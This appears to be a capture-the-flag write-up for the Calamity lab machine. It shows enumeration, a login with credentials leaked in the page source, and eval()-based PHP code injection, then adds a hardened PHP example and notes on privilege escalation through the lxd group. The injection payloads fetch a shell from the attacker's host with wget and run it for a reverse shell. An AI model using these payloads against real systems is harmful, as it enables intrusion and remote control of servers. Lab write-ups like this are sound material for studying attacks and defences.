10.10.10.27 - Calamity - php command injection
PHP code injection, Privilege Escalation through groups
Summary:
Vulnerable software: vulnerability in the PHP code
System vulnerable: 10.10.10.27
Vulnerability explanation: privilege escalation, LXD user given root permissions
Severity: critical
Enumeration with nmap and masscan:
I used opendoor.py to discover critical directories that led to server compromise later on:
Command run:
python ./opendoor.py --host 10.10.10.27 -s directories -t 50
Credentials exposed in the source code of admin.php:
Successful login with user admin and password skoupidotenekes, and PHP code injection when submitting <?php phpinfo() ?> in the "Your HTML" form:
Gaining Access:
Since the PHP code injection lets us run shell commands, we use it to download a shell, x.php:
<?php echo shell_exec("wget http://10.10.14.16:8000/x.php -O /var/tmp/x.php 2>&1");?>
wget saving shell to /var/tmp/x.php
In the same manner execute: <?php echo shell_exec("php /var/tmp/x.php 2>&1");?> to gain a reverse shell on the port we set up earlier:
Content of admin.php responsible for the code injection:
[email protected]:/var/www/html$ cat admin.php
cat admin.php
<?php

if (!isset($_COOKIE['adminpowa'])) {
?>
<html><body>

<form method="post">
Password: <input type="text" name="user"><br>
Username: <input type="password" name="pass">
<input type="submit" value="Log in to the powerful administrator page">
<!-- password is:skoupidotenekes-->
</form>
</body></html>
<?php
if(isset($_POST['user']) && isset($_POST['pass'])){
$u = $_POST['user'];
$p = $_POST['pass'];

if ($u=="admin" && $p=="skoupidotenekes") {setcookie("adminpowa", "noonecares"); header("refresh: 0;");}
else{echo "GET OUT OF HERE ";}
}


}
?>

<?php
if (isset($_COOKIE['adminpowa'])) {
?>

<html>
<title>GOT U BEEJAY</title>
<body>
TADAA IT HAS NOTHING
<br>
what were you waiting for dude ?you know I aint finished creating<br>
xalvas,the boss said I am a piece of shit and that I dont take my job seriously...but when all this is set up...Ima ask for double the money<br>
just cauz he insulted me <br>
Maybe he's still angry at me deleting the DB on the previous site...he should keep backups man !
<br>
anyway I made an html interpreter to work on my php skills !

It wasn't easy I assure you...I'm just a P-R-O on PHP !!!!!!!!!
<br>
access in here is like 99% secure ,but even if that 1% reaches this page ,there's nothing they can do !
<br>
html is super-harmless to our system!
Try writing some simple stuff ...and see how difficult my job is and how underpaid I am



<form method="get">
Your HTML: <input type="text" name="html"><br>
<input type="submit" value="SHOW ME DA PAGE">
</form>
</body></html>
<?php
//print "\$myvar=\"test\";phpinfo();\n";
$x = $_GET['html'];
$cmd="?>" . $x;
eval($cmd); //what could possibly go wrong ?
//echo $myvar;

}
?>
Explanation of the vulnerable part of the code (the quoted text is the bash built-in's description; PHP's eval() does the same thing with a string of PHP code, which is why concatenating "?>" with $_GET['html'] and passing it to eval() is remote code execution):
eval [arg ...]
The args are read and concatenated together into a single command. This command is then read and executed by the shell, and its exit status is returned as the value of eval. If there are no args, or only null arguments, eval returns 0.
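To make the listing and the eval() explanation above concrete, here is an added example (my own code, not the box's admin.php or anything from the write-up) that puts the page's eval() sink next to a hardened version of the same "show me your HTML" feature, and replaces the plaintext password check and the forgeable adminpowa cookie with a hashed password and a server-side session. The payload string, the demo password and the ADMIN_USER constant are constructed for the demonstration.

```php
<?php
// Added example, not the box's admin.php: the page's eval() sink beside a
// hardened version of the same feature, plus a safer login check.
// All inputs below are constructed for the demo.

// --- Vulnerable: mirrors the page's code. eval() starts in PHP mode, the
// leading "?>" switches to inline HTML, and any "<?php ... ?>" that the user
// typed switches back and runs as code on the server.
function render_vulnerable(string $x): string
{
    ob_start();
    eval("?>" . $x);          // what could possibly go wrong? Everything.
    return (string) ob_get_clean();
}

// --- Hardened: user input never reaches eval(). The feature only needs to
// show the text the user typed, so encode it; the browser displays the markup
// literally and PHP never parses it. If a real markup subset must be rendered,
// use a proper sanitizer (e.g. HTML Purifier): strip_tags() with an allow-list
// still leaves event-handler attributes on the allowed tags.
function render_hardened(string $x): string
{
    return htmlspecialchars($x, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- Login: the original compares a plaintext password that is also printed in
// an HTML comment, then trusts the mere presence of the "adminpowa" cookie,
// which any client can set itself. Store only a hash, compare it with
// password_verify(), and keep the logged-in state in a server-side session.
const ADMIN_USER = 'admin';                       // constructed for the demo

function login_ok(string $user, string $pass, string $storedHash): bool
{
    // hash_equals() keeps the username comparison constant-time as well
    return hash_equals(ADMIN_USER, $user) && password_verify($pass, $storedHash);
}

function mark_logged_in(): void
{
    // In a web context: session_start() before any output, then set the flag.
    // Unlike setcookie("adminpowa", ...), the client cannot forge this state.
    if (session_status() === PHP_SESSION_NONE && PHP_SAPI !== 'cli') {
        session_start();
    }
    $_SESSION['is_admin'] = true;
}

// --- Demo: the same kind of payload the write-up used, with a benign tag.
$payload = '<b>hello</b><?php echo 2 + 2; ?>';

echo "vulnerable: ", render_vulnerable($payload), "\n";  // the <?php tag executes
echo "hardened:   ", render_hardened($payload), "\n";    // shown as encoded text only

// Hash generated at run time for the demo; in production it lives in config
// or a credential store, never in the page source or an HTML comment.
$adminHash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);

var_dump(login_ok('admin', 'correct horse battery staple', $adminHash)); // correct creds
var_dump(login_ok('admin', 'skoupidotenekes', $adminHash));              // wrong password
if (login_ok('admin', 'correct horse battery staple', $adminHash)) {
    mark_logged_in();
}
```

Run it with `php example.php` from the command line: the first line shows that the code inside the payload ran inside render_vulnerable(), while the hardened path prints the payload as inert text. The two design choices that matter are that nothing user-controlled is ever concatenated into code, and that authorization state is held server-side rather than inferred from a cookie the client chooses.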
On a different note, the mysterious recording recov.wav contains "Never Give You Up" by Rick Astley. Well done there.
Privilege escalation:
1) Look at the differences in wav files
2) Privesc through groups:
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)